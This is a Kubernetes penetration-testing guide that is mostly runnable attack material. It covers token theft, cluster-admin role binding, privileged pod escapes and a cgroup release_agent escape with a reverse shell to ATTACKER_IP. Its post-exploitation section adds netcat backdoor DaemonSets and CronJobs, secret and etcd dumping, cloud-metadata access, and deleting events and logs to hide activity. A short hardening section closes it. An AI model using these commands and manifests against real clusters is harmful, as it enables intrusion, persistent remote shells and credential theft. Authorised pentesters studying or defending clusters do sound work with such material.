Kubernetes

A comprehensive guide for penetration testing Kubernetes clusters and environments.


Table of Contents

  1. Kubernetes Architecture
  2. Enumeration
  3. Service Account Token Exploitation
  4. RBAC Privilege Escalation
  5. Pod Escape Techniques
  6. Common Vulnerabilities
  7. Pentesting Tools
  8. Attack Paths
  9. Post-Exploitation
  10. Security Best Practices

Kubernetes Architecture

Control Plane Components

┌─────────────────────────────────────────┐
│         Control Plane (Master)          │
├─────────────────────────────────────────┤
│  • kube-apiserver (6443)                │
│  • etcd (2379-2380)                     │
│  • kube-scheduler                       │
│  • kube-controller-manager              │
│  • cloud-controller-manager             │
└─────────────────────────────────────────┘

kube-apiserver - Front end for the Kubernetes control plane; exposes the Kubernetes API
etcd - Consistent, highly available key-value store for all cluster data
kube-scheduler - Watches for newly created Pods and assigns them to nodes
kube-controller-manager - Runs controller processes
cloud-controller-manager - Links the cluster to the cloud provider's API

Worker Node Components

┌─────────────────────────────────────────┐
│           Worker Nodes                  │
├─────────────────────────────────────────┤
│  • kubelet (10250, 10255)               │
│  • kube-proxy                           │
│  • Container Runtime (Docker/containerd)│
└─────────────────────────────────────────┘

kubelet - Agent that ensures containers are running in a Pod
kube-proxy - Network proxy maintaining network rules on nodes
Container Runtime - Software responsible for running containers

Default Ports

| Port | Service | Description |
|---|---|---|
| 6443 | kube-apiserver | Kubernetes API server (HTTPS) |
| 2379-2380 | etcd | Client and peer communication |
| 10250 | kubelet | Kubelet API (HTTPS) |
| 10255 | kubelet | Read-only kubelet API (HTTP, deprecated) |
| 10256 | kube-proxy | Health check server |
| 8080 | kube-apiserver | Insecure port (deprecated) |
| 30000-32767 | NodePort | Services exposed on nodes |
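
When mapping a cluster from outside, these defaults are the first thing to check. A minimal sketch of such a probe in Python (the host, timeout, and port list here are illustrative assumptions, not part of any Kubernetes tooling):

```python
# Probe the well-known Kubernetes ports over plain TCP.
import socket

K8S_PORTS = {
    6443: "kube-apiserver",
    2379: "etcd (client)",
    2380: "etcd (peer)",
    10250: "kubelet API",
    10255: "kubelet read-only (deprecated)",
    10256: "kube-proxy health",
    8080: "insecure API (deprecated)",
}

def probe(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def scan_host(host):
    """Map each well-known Kubernetes port to its open/closed state."""
    return {port: probe(host, port) for port in K8S_PORTS}
```

A connect scan like this is noisier than nmap's SYN scan but needs no privileges.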

Enumeration

Detecting Kubernetes Environment

# Check if you're inside a Kubernetes pod
ls -la /var/run/secrets/kubernetes.io/serviceaccount/
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Check environment variables
env | grep -i kube
env | grep -i service

# DNS resolution (Kubernetes DNS)
cat /etc/resolv.conf
nslookup kubernetes.default
nslookup kubernetes.default.svc.cluster.local

# Check for .dockerenv or container indicators
ls -la /.dockerenv
cat /proc/1/cgroup | grep -i kube
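
The same checks can be rolled into one helper. A sketch (the function name is illustrative; the filesystem root and environment are parameters so it can be exercised outside a cluster):

```python
# Heuristic in-pod detection: SA token mount, KUBERNETES_* env vars,
# or a kubepods cgroup for PID 1.
import os

SA_DIR = "var/run/secrets/kubernetes.io/serviceaccount"

def looks_like_k8s_pod(root="/", env=None):
    """Return True if any of the common Kubernetes pod indicators is present."""
    env = os.environ if env is None else env
    if os.path.isdir(os.path.join(root, SA_DIR)):
        return True
    if any(k.startswith("KUBERNETES_") for k in env):
        return True
    try:
        with open(os.path.join(root, "proc/1/cgroup")) as fh:
            return "kubepods" in fh.read()
    except OSError:
        return False
```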

API Server Discovery

# Find the API server
echo $KUBERNETES_SERVICE_HOST
echo $KUBERNETES_PORT

# Common API server location
curl -k https://kubernetes.default.svc.cluster.local:443

# Get API server info
curl -k https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT/api/v1

# Check version
curl -k https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT/version

kubectl Configuration

# Set up kubectl alias with token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_PORT}"

alias k='kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true'

# Alternative: Create kubeconfig
cat << EOF > /tmp/config
apiVersion: v1
kind: Config
clusters:
- cluster:
    insecure-skip-tls-verify: true
    server: https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT
  name: local
contexts:
- context:
    cluster: local
    namespace: default
    user: local
  name: local
current-context: local
users:
- name: local
  user:
    token: $TOKEN
EOF

export KUBECONFIG=/tmp/config

Basic Enumeration

# Check permissions
kubectl auth can-i --list
kubectl auth can-i get pods
kubectl auth can-i create pods
kubectl auth can-i get secrets
kubectl auth can-i create pods --as system:serviceaccount:default:default

# List resources
kubectl get nodes
kubectl get pods --all-namespaces
kubectl get services --all-namespaces
kubectl get secrets --all-namespaces
kubectl get configmaps --all-namespaces
kubectl get namespaces
kubectl get deployments --all-namespaces
kubectl get daemonsets --all-namespaces

# Get current context
kubectl config view
kubectl config get-contexts
kubectl auth whoami

# Describe resources for detailed info
kubectl describe node <node-name>
kubectl describe pod <pod-name> -n <namespace>
kubectl get pod <pod-name> -n <namespace> -o yaml

Service Account Enumeration

# List service accounts
kubectl get serviceaccounts --all-namespaces
kubectl get sa --all-namespaces

# Get service account details
kubectl describe sa <service-account-name> -n <namespace>
kubectl get sa <service-account-name> -n <namespace> -o yaml

# List service account tokens
kubectl get secrets --all-namespaces --field-selector type=kubernetes.io/service-account-token

RBAC Enumeration

# List roles and clusterroles
kubectl get roles --all-namespaces
kubectl get clusterroles
kubectl get rolebindings --all-namespaces
kubectl get clusterrolebindings

# Describe RBAC resources
kubectl describe clusterrole cluster-admin
kubectl describe clusterrolebinding cluster-admin

# Find who has specific permissions
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin") | .subjects'

# List all subjects with cluster-admin
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin")'
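
The jq filters above can also be expressed as a small Python helper when post-processing dumped JSON offline. A sketch; `bindings` is assumed to be the parsed output of `kubectl get clusterrolebindings -o json`:

```python
# Collect every subject bound to the cluster-admin ClusterRole.
def cluster_admin_subjects(bindings):
    """Return the subject list from all cluster-admin ClusterRoleBindings."""
    subjects = []
    for item in bindings.get("items", []):
        if item.get("roleRef", {}).get("name") == "cluster-admin":
            # "subjects" may be absent on a binding with no subjects
            subjects.extend(item.get("subjects") or [])
    return subjects
```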

Network Enumeration

# Get network policies
kubectl get networkpolicies --all-namespaces

# Service discovery
kubectl get svc --all-namespaces
kubectl get endpoints --all-namespaces

# DNS enumeration
kubectl get svc --all-namespaces -o json \
  | jq -r '.items[] | "\(.metadata.name).\(.metadata.namespace).svc.cluster.local"' \
  | while read -r fqdn; do
      echo "Testing $fqdn"
      nslookup "$fqdn"
    done

# Scan internal network
nmap 10.0.0.0/8
nmap 172.16.0.0/12
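
The per-namespace service FQDNs used in the DNS loop above follow the fixed pattern `name.namespace.svc.cluster.local`. A sketch that builds them from dumped JSON (`svc_json` is assumed to be the parsed output of `kubectl get svc --all-namespaces -o json`):

```python
# Build the cluster-internal DNS name for every Service.
def service_fqdns(svc_json, zone="svc.cluster.local"):
    """Return name.namespace.<zone> for each listed Service."""
    return [
        "{}.{}.{}".format(i["metadata"]["name"], i["metadata"]["namespace"], zone)
        for i in svc_json.get("items", [])
    ]
```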

Secret Enumeration

# List secrets
kubectl get secrets --all-namespaces
kubectl get secrets -n kube-system

# Get secret contents
kubectl get secret <secret-name> -n <namespace> -o yaml
kubectl get secret <secret-name> -n <namespace> -o json | jq -r '.data | to_entries[] | "\(.key): \(.value | @base64d)"'

# Decode specific secret
kubectl get secret <secret-name> -n <namespace> -o jsonpath='{.data.password}' | base64 -d
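
The API returns every value in a Secret's `.data` map base64-encoded; the `@base64d` step above can be sketched in Python for offline processing of dumped secrets:

```python
# Decode every base64 value in a Secret's .data map to a string.
import base64

def decode_secret_data(data):
    """Return the .data map with all values base64-decoded."""
    return {k: base64.b64decode(v).decode("utf-8", errors="replace")
            for k, v in data.items()}
```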

Service Account Token Exploitation

Extracting Service Account Token

# From inside a pod
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CA_CERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

# View token claims (JWT)
echo $TOKEN | cut -d '.' -f2 | base64 -d | jq

# Test token
curl -k -H "Authorization: Bearer $TOKEN" \
  https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT/api/v1/namespaces/$NAMESPACE/pods
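
The JWT payload segment is base64url-encoded with padding stripped, which the plain `base64 -d` one-liner above can choke on. A small sketch that re-pads before decoding:

```python
# Decode the (unverified) claims of a service-account JWT.
import base64
import json

def jwt_claims(token):
    """Return the payload claims of a JWT without verifying its signature."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))
```

Useful claims include `sub` (the service account identity) and, on bound tokens, the `kubernetes.io` audience and pod binding.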

Using Stolen Tokens

# Use token with kubectl
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true get pods

# Use token with curl
curl -k -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/pods

# Test permissions with stolen token
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true auth can-i --list

Mounting Other Service Account Tokens

# Create pod with different service account
apiVersion: v1
kind: Pod
metadata:
  name: token-stealer
spec:
  serviceAccountName: admin-sa  # Target service account
  containers:
  - name: alpine
    image: alpine
    command: ["sh", "-c", "cat /var/run/secrets/kubernetes.io/serviceaccount/token && sleep 3600"]

Token from Node Filesystem

# If you have access to node filesystem
# Tokens are stored in: /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token

find /var/lib/kubelet/pods -name token 2>/dev/null
cat /var/lib/kubelet/pods/<pod-id>/volumes/kubernetes.io~secret/<secret-name>/token
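
The `find` above can be mirrored with a directory walk when scripting token collection. A sketch (the default path matches the kubelet layout noted above):

```python
# Walk a kubelet pods tree and collect every file literally named `token`.
import os

def find_tokens(kubelet_pods_dir="/var/lib/kubelet/pods"):
    """Return sorted paths of 'token' files under the kubelet pods tree."""
    hits = []
    for dirpath, _dirs, files in os.walk(kubelet_pods_dir):
        if "token" in files:
            hits.append(os.path.join(dirpath, "token"))
    return sorted(hits)
```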

RBAC Privilege Escalation

Dangerous Permissions

1. Create Pods

# Check permission
kubectl auth can-i create pods

# Exploit: Create privileged pod
apiVersion: v1
kind: Pod
metadata:
  name: privesc-pod
spec:
  serviceAccountName: high-privilege-sa
  containers:
  - name: alpine
    image: alpine
    command: ["sh", "-c", "cat /var/run/secrets/kubernetes.io/serviceaccount/token && sleep 3600"]

2. Create/Update Deployments, DaemonSets, StatefulSets

# Check permission
kubectl auth can-i create deployments

# Exploit: Deploy with privileged service account
apiVersion: apps/v1
kind: Deployment
metadata:
  name: privesc-deployment
spec:
  replicas: 1
  selector:
    matchLabels:
      app: privesc
  template:
    metadata:
      labels:
        app: privesc
    spec:
      serviceAccountName: admin-sa
      containers:
      - name: alpine
        image: alpine
        command: ["/bin/sh", "-c", "sleep 3600"]

3. List/Get Secrets

# Check permission
kubectl auth can-i get secrets --all-namespaces

# Exploit: Extract all secrets
kubectl get secrets --all-namespaces -o json > all-secrets.json

# Get admin tokens from kube-system
kubectl get secrets -n kube-system
kubectl get secret <admin-token> -n kube-system -o jsonpath='{.data.token}' | base64 -d

4. Create/Bind Roles and ClusterRoles

# Check permissions
kubectl auth can-i create clusterrolebindings
kubectl auth can-i bind clusterroles

# Exploit: Bind cluster-admin to yourself
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: privesc-binding
subjects:
- kind: ServiceAccount
  name: default
  namespace: default
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io

# Apply
kubectl apply -f privesc-binding.yaml
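
Since kubectl accepts JSON as well as YAML, the binding manifest above can be generated programmatically and piped to `kubectl apply -f -`. A sketch; the function and default binding name are illustrative:

```python
# Build a ClusterRoleBinding manifest granting cluster-admin to a service account.
import json

def admin_binding(sa_name, namespace, binding_name="privesc-binding"):
    """Return a JSON ClusterRoleBinding for the given ServiceAccount."""
    return json.dumps({
        "apiVersion": "rbac.authorization.k8s.io/v1",
        "kind": "ClusterRoleBinding",
        "metadata": {"name": binding_name},
        "subjects": [{"kind": "ServiceAccount",
                      "name": sa_name, "namespace": namespace}],
        "roleRef": {"kind": "ClusterRole", "name": "cluster-admin",
                    "apiGroup": "rbac.authorization.k8s.io"},
    }, indent=2)
```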

5. Impersonate Users/Groups/ServiceAccounts

# Check permission
kubectl auth can-i impersonate users
kubectl auth can-i impersonate groups
kubectl auth can-i impersonate serviceaccounts

# Exploit: Impersonate admin user
kubectl --as=admin get secrets --all-namespaces
kubectl --as=system:serviceaccount:kube-system:admin get secrets

# Impersonate system:masters group
kubectl --as=admin --as-group=system:masters get secrets --all-namespaces  # --as-group requires --as

# Using API
curl -k -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: admin" \
  $APISERVER/api/v1/namespaces/default/secrets

6. Escalate Role Privileges

# Check permission
kubectl auth can-i escalate roles

# Exploit: Modify existing role
kubectl edit role <role-name> -n <namespace>
# Add: - apiGroups: ["*"]
#        resources: ["*"]
#        verbs: ["*"]

7. Certificate Signing Request (CSR) Abuse

# Check permissions
kubectl auth can-i create certificatesigningrequests
kubectl auth can-i approve certificatesigningrequests

# Generate key and CSR
openssl genrsa -out hacker.key 2048
openssl req -new -key hacker.key -out hacker.csr -subj "/CN=system:masters"

# Create CSR in Kubernetes
cat <<EOF | kubectl apply -f -
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: hacker-csr
spec:
  request: $(cat hacker.csr | base64 | tr -d '\n')
  signerName: kubernetes.io/kube-apiserver-client
  usages:
  - client auth
EOF

# Approve CSR
kubectl certificate approve hacker-csr

# Get certificate
kubectl get csr hacker-csr -o jsonpath='{.status.certificate}' | base64 -d > hacker.crt

# Use certificate for authentication
kubectl --client-certificate=hacker.crt --client-key=hacker.key get secrets --all-namespaces

8. Patch Service Accounts

# Check permission
kubectl auth can-i patch serviceaccounts

# Exploit: Add secrets to service account
kubectl patch serviceaccount default -p '{"secrets": [{"name": "admin-token"}]}'

RBAC Privilege Escalation Paths

# Path 1: Create pods → Mount privileged SA token → Escalate
kubectl create pod → Mount admin SA → Extract token → Use token

# Path 2: Get secrets → Extract admin token → Escalate
kubectl get secrets -n kube-system → Extract token → Use admin token

# Path 3: Bind roles → Grant cluster-admin → Escalate
kubectl create clusterrolebinding → Bind cluster-admin → Full access

# Path 4: Impersonate → Act as admin → Escalate
kubectl --as=admin → Execute as admin → Full access

# Path 5: Node access → Steal tokens → Escalate
Access node FS → Find pod tokens → Use privileged tokens

Pod Escape Techniques

Bad Pod #1: Everything Allowed (Privileged + hostPath + hostNetwork + hostPID + hostIPC)

apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: alpine
    image: alpine
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: ["/bin/sh"]
    args: ["-c", "chroot /host bash"]
  volumes:
  - name: noderoot
    hostPath:
      path: /

Bad Pod #2: Privileged + hostPID

apiVersion: v1
kind: Pod
metadata:
  name: priv-hostpid
spec:
  hostPID: true
  containers:
  - name: alpine
    image: alpine
    securityContext:
      privileged: true
    command: ["/bin/sh"]
    args: ["-c", "nsenter -t 1 -m -u -i -n bash"]

Bad Pod #3: Privileged Only

apiVersion: v1
kind: Pod
metadata:
  name: priv-only
spec:
  containers:
  - name: alpine
    image: alpine
    securityContext:
      privileged: true
    command: ["/bin/sh"]
    args: ["-c", "mount /dev/sda1 /mnt && chroot /mnt bash"]

Bad Pod #4: hostPath Only

apiVersion: v1
kind: Pod
metadata:
  name: hostpath-mount
spec:
  containers:
  - name: alpine
    image: alpine
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: ["/bin/sh"]
    args: ["-c", "echo 'ssh-rsa AAAA...' >> /host/root/.ssh/authorized_keys"]
  volumes:
  - name: noderoot
    hostPath:
      path: /

Bad Pod #5: hostPID Only

apiVersion: v1
kind: Pod
metadata:
  name: hostpid-only
spec:
  hostPID: true
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "ps aux | grep -i secret"]  # View all host processes

Bad Pod #6: hostNetwork Only

apiVersion: v1
kind: Pod
metadata:
  name: hostnetwork-only
spec:
  hostNetwork: true
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "tcpdump -i any -w /tmp/capture.pcap"]  # Sniff host traffic

Container Breakout via Privileged Container

# Inside privileged container
# Method 1: Mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host

# Method 2: Access via nsenter
nsenter --target 1 --mount --uts --ipc --net --pid bash

# Method 3: Create cgroup release_agent escape
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
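
The `sed` step above extracts the overlayfs `upperdir` (the container's root as seen from the host) from the `/etc/mtab` overlay entry. The same parse, sketched in Python:

```python
# Pull the upperdir= mount option out of an overlay mtab/mountinfo line.
import re
from typing import Optional

def overlay_upperdir(mtab_line: str) -> Optional[str]:
    """Return the upperdir= option from an overlay mount entry, if present."""
    m = re.search(r"upperdir=([^,\s]+)", mtab_line)
    return m.group(1) if m else None
```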

Capabilities-Based Escape

# Check capabilities
capsh --print
cat /proc/self/status | grep Cap

# CAP_SYS_ADMIN escape
# Similar to privileged container escape

# CAP_SYS_PTRACE escape
# Inject into host processes

# CAP_SYS_MODULE escape
# Load malicious kernel modules
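
The `CapEff` value in `/proc/self/status` is a hex bitmask of kernel capability numbers. A sketch that decodes it into the escape-relevant capabilities named above (bit positions are the kernel's standard capability numbers):

```python
# Map escape-relevant capability numbers to names.
CAPS = {
    1: "CAP_DAC_OVERRIDE",
    16: "CAP_SYS_MODULE",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",
}

def dangerous_caps(cap_hex):
    """List which escape-relevant capabilities are set in a hex CapEff mask."""
    mask = int(cap_hex, 16)
    return [name for bit, name in sorted(CAPS.items()) if mask & (1 << bit)]
```

For example, a fully privileged container typically shows `CapEff: 0000003fffffffff`, which sets all four.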

Common Vulnerabilities

CVE-2018-1002105 (Privilege Escalation via API Server)

Description: Unauthenticated users can escalate privileges through API aggregation
Affected Versions: all versions prior to 1.10.11, 1.11.5, and 1.12.3
Impact: Remote privilege escalation to cluster admin

# Detection
kubectl version

# Exploit (conceptual)
# Abuse proxied upgrade requests to escalate privileges

CVE-2019-11247 (API Server Authorization Bypass)

Description: API server improperly validates object scope
Impact: Cross-namespace access to resources

CVE-2019-11253 (YAML Parsing DoS)

Description: Malicious YAML causes API server DoS
Impact: Denial of service

CVE-2020-8558 (Node Network Bypass)

Description: localhost services accessible from other nodes
Impact: Unauthorized access to node services

CVE-2020-8559 (Privilege Escalation via Redirect)

Description: Compromised node can redirect API requests
Affected Versions: 1.16.0-1.16.12, 1.17.0-1.17.8, 1.18.0-1.18.5
Impact: Node compromise leads to cluster compromise

CVE-2021-25741 (subPath Symlink Attack)

Description: Subpath volume mounts vulnerable to symlink attack
Impact: Access files outside container

# Exploit path traversal via symlinks in subPath

CVE-2021-25735 (Node Update Bypass)

Description: NodeRestriction admission controller bypass
Impact: Malicious nodes can bypass validations

CVE-2022-0492 (Container Escape - Linux Kernel)

Description: cgroups privilege escalation
Impact: Container escape to host

# Exploit via cgroup release_agent
# Requires CAP_DAC_OVERRIDE or root

CVE-2023-3676, CVE-2023-3955, CVE-2023-3893 (Windows Node RCE)

Description: Command injection via YAML on Windows nodes
Affected: Kubernetes on Windows
Impact: SYSTEM-level code execution

# Exploit via malicious subPath in YAML
subPath: "$(Start-Process cmd)"

CVE-2023-5528 (Windows Local Volume RCE)

Description: Command injection via local volumes on Windows
Impact: Admin privileges on Windows nodes

CVE-2024-21626 (Leaky Vessels - runC)

Description: Container escape via working directory manipulation
Impact: Full container escape

CVE-2024-31989 (Argo CD Redis Exposure)

Description: Argo CD Redis instance has no password
Impact: Privilege escalation, information leakage

CVE-2025-1974, CVE-2025-24514 (IngressNightmare - NGINX Controller)

Description: RCE via ingress-nginx admission webhook
Affected: NGINX Ingress Controller
Impact: Cluster-wide secret access, RCE

# Detection
kubectl get pods -n ingress-nginx
kubectl version

Pentesting Tools

kube-hunter

# Installation
pip install kube-hunter

# Remote scanning
kube-hunter --remote <target-ip>

# From inside pod
kube-hunter --pod

# Active hunting (exploits vulnerabilities)
kube-hunter --active

# Network scanning
kube-hunter --cidr 10.0.0.0/8

KubiScan

# Installation
git clone https://github.com/cyberark/KubiScan
cd KubiScan
pip install -r requirements.txt

# Run with kubeconfig
python3 kubiscan.py

# Find risky roles
python3 kubiscan.py -rr

# Find risky rolebindings
python3 kubiscan.py -rrb

# Find risky subjects (users/SAs)
python3 kubiscan.py -rs

# Get service account tokens
python3 kubiscan.py -at

Peirates

# Download
wget https://github.com/inguardians/peirates/releases/download/v1.1.19/peirates-linux-amd64.tar.xz
tar -xf peirates-linux-amd64.tar.xz

# Run from compromised pod
./peirates

# Main menu options:
# [1] List service accounts
# [2] Get service account token
# [3] Switch to another token
# [4] List pods
# [5] Get secrets
# [6] Attack pod exec
# [7] Request a new token
# [8] Scan for pods with volume mounts

kubectl Plugins

# kubectl-who-can
kubectl who-can create pods
kubectl who-can get secrets --all-namespaces

# kubectl-access-matrix
kubectl access-matrix

# rakkess
kubectl rakkess
kubectl rakkess --verbs get,list,watch,create,delete

# rbac-lookup
kubectl rbac-lookup admin
kubectl rbac-lookup -o wide

kube-bench

# Run as job in cluster
kubectl apply -f https://raw.githubusercontent.com/aquasecurity/kube-bench/main/job.yaml

# Run on node
docker run --pid=host -v /etc:/etc:ro -v /var:/var:ro \
  aquasec/kube-bench:latest run --targets node

# Check master components
docker run --pid=host -v /etc:/etc:ro -v /var:/var:ro \
  aquasec/kube-bench:latest run --targets master

Kubescape

# Installation
curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash

# Scan cluster
kubescape scan

# Scan against specific framework
kubescape scan framework nsa
kubescape scan framework mitre
kubescape scan framework cis

# Scan specific namespace
kubescape scan --include-namespaces default

# Generate report
kubescape scan --format json --output results.json

KubeHound

# Attack path analysis
# Installation and setup required

# Example query - Find paths to cluster-admin
kh.V().has('name', 'default').repeat(outE().inV()).times(3).has('critical', true).path()

# Find container escape paths
kh.V().has('pod', true).outE('CE_MODULE_LOAD').inV().path()

# Find privilege escalation via RBAC
kh.V().has('type', 'Identity').outE('IDENTITY_ASSUME').inV().path()

kubeletctl

# Installation
wget https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64
chmod +x kubeletctl_linux_amd64

# Scan for open kubelets
kubeletctl scan --cidr 10.0.0.0/8

# Get pods
kubeletctl pods -s <target-ip>

# Run command in pod
kubeletctl exec "id" -s <target-ip> -p <pod-name> -c <container-name>

# Get pod logs
kubeletctl logs -s <target-ip> -p <pod-name> -c <container-name>

Other Useful Tools

# kubeaudit - Audit Kubernetes clusters
kubeaudit all

# kubesec - Security risk analysis for Kubernetes resources
kubesec scan pod.yaml

# Trivy - Vulnerability scanner
trivy k8s --report summary cluster

# Falco - Runtime security
# Monitors suspicious activity in Kubernetes

# BOtB (Break out the Box)
# Automated container breakout detection

# CDK - Zero-dependency container penetration toolkit
# Container environment evaluation and exploitation

Attack Paths

Path 1: Anonymous API Access → Enumeration → Privilege Escalation

# 1. Check for anonymous access
curl -k https://<api-server>:6443/api/v1

# 2. Enumerate resources
curl -k https://<api-server>:6443/api/v1/namespaces
curl -k https://<api-server>:6443/api/v1/pods

# 3. Create malicious pod if allowed
curl -k -X POST https://<api-server>:6443/api/v1/namespaces/default/pods \
  -H "Content-Type: application/json" \
  -d @malicious-pod.json

Path 2: Compromised Pod → Service Account Token → Privilege Escalation

# 1. Extract token from pod
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# 2. Test permissions
kubectl --token=$TOKEN auth can-i --list

# 3. Exploit permissions (e.g., create pods with privileged SA)
kubectl --token=$TOKEN create -f privesc-pod.yaml

# 4. Extract new token
NEW_TOKEN=$(kubectl --token=$TOKEN exec privesc-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# 5. Escalate to cluster admin
kubectl --token=$NEW_TOKEN get secrets --all-namespaces

Path 3: Exposed Kubelet → Token Theft → Cluster Compromise

# 1. Find exposed kubelet
nmap -p 10250 10.0.0.0/8

# 2. Access kubelet API
curl -k https://<node-ip>:10250/pods

# 3. Extract service account tokens
kubeletctl scan --cidr 10.0.0.0/8
kubeletctl pods -s <node-ip>
kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -s <node-ip> -p <pod> -c <container>

# 4. Use extracted token
kubectl --token=$EXTRACTED_TOKEN get secrets --all-namespaces

Path 4: RBAC Misconfiguration → Role Binding → Cluster Admin

# 1. Check current permissions
kubectl auth can-i create clusterrolebindings

# 2. Bind cluster-admin to yourself
kubectl create clusterrolebinding attacker-admin \
  --clusterrole=cluster-admin \
  --serviceaccount=default:default

# 3. Verify escalation
kubectl get secrets --all-namespaces

Path 5: Container Escape → Node Access → Token Collection

# 1. Deploy privileged pod
kubectl apply -f privileged-pod.yaml

# 2. Escape to node
kubectl exec -it privileged-pod -- bash
chroot /host

# 3. Collect all service account tokens from node
find /var/lib/kubelet/pods -name token

# 4. Use highest privileged token
kubectl --token=$ADMIN_TOKEN get secrets --all-namespaces

Post-Exploitation

Persistence

# Create backdoor service account
kubectl create sa backdoor
kubectl create clusterrolebinding backdoor-admin \
  --clusterrole=cluster-admin \
  --serviceaccount=default:backdoor

# Get persistent token
kubectl create token backdoor --duration=87600h  # request 10 years (the API server may cap the actual expiry)

# Create malicious DaemonSet (runs on all nodes)
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: backdoor
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: backdoor
  template:
    metadata:
      labels:
        app: backdoor
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: backdoor
        image: alpine
        command: ["/bin/sh", "-c"]
        args:
        - |
          while true; do
            nc -l -p 4444 -e /bin/sh
          done
        securityContext:
          privileged: true

# Create CronJob for periodic access
apiVersion: batch/v1
kind: CronJob
metadata:
  name: backdoor-cron
spec:
  schedule: "*/5 * * * *"  # Every 5 minutes
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: backdoor
            image: alpine
            command: ["/bin/sh", "-c"]
            args:
            - "nc ATTACKER_IP 4444 -e /bin/sh"
          restartPolicy: OnFailure

Data Exfiltration

# Extract all secrets
kubectl get secrets --all-namespaces -o json > secrets.json

# Extract ConfigMaps
kubectl get configmaps --all-namespaces -o json > configmaps.json

# Extract environment variables from all pods
kubectl get pods --all-namespaces -o json | jq '.items[].spec.containers[].env'

# Extract etcd data (if accessible)
ETCDCTL_API=3 etcdctl --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get / --prefix --keys-only

Lateral Movement

# Move to other namespaces
kubectl get pods -n kube-system
kubectl exec -it <pod-name> -n kube-system -- bash

# Access cloud metadata (AWS, GCP, Azure)
curl http://169.254.169.254/latest/meta-data/
curl http://metadata.google.internal/computeMetadata/v1/
curl http://169.254.169.254/metadata/instance?api-version=2021-02-01 -H "Metadata:true"

# Pivot to cloud resources
# Use pod IAM roles/service accounts to access cloud APIs

Covering Tracks

# Delete audit logs (if accessible)
kubectl delete events --all
kubectl delete events --all -n kube-system

# Remove malicious pods
kubectl delete pod <malicious-pod>

# Remove RBAC modifications
kubectl delete clusterrolebinding <backdoor-binding>

# Truncate container logs on the node (requires node filesystem access)
truncate -s 0 /var/log/pods/<namespace>_<pod-name>_<pod-uid>/<container>/*.log

Security Best Practices

API Server Security

# ✅ Enable RBAC
--authorization-mode=Node,RBAC

# ✅ Disable anonymous auth
--anonymous-auth=false

# ✅ Enable audit logging
--audit-log-path=/var/log/kubernetes/audit.log
--audit-policy-file=/etc/kubernetes/audit-policy.yaml

# ✅ Disable insecure port
--insecure-port=0

# ✅ Enable admission controllers
--enable-admission-plugins=PodSecurityPolicy,NodeRestriction,AlwaysPullImages

# ❌ Never expose without authentication
# Don't use: --insecure-port=8080

Pod Security

# ✅ Use Pod Security Standards
apiVersion: v1
kind: Namespace
metadata:
  name: secure-namespace
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted

# ✅ Drop all capabilities
securityContext:
  capabilities:
    drop:
      - ALL

# ✅ Run as non-root
securityContext:
  runAsNonRoot: true
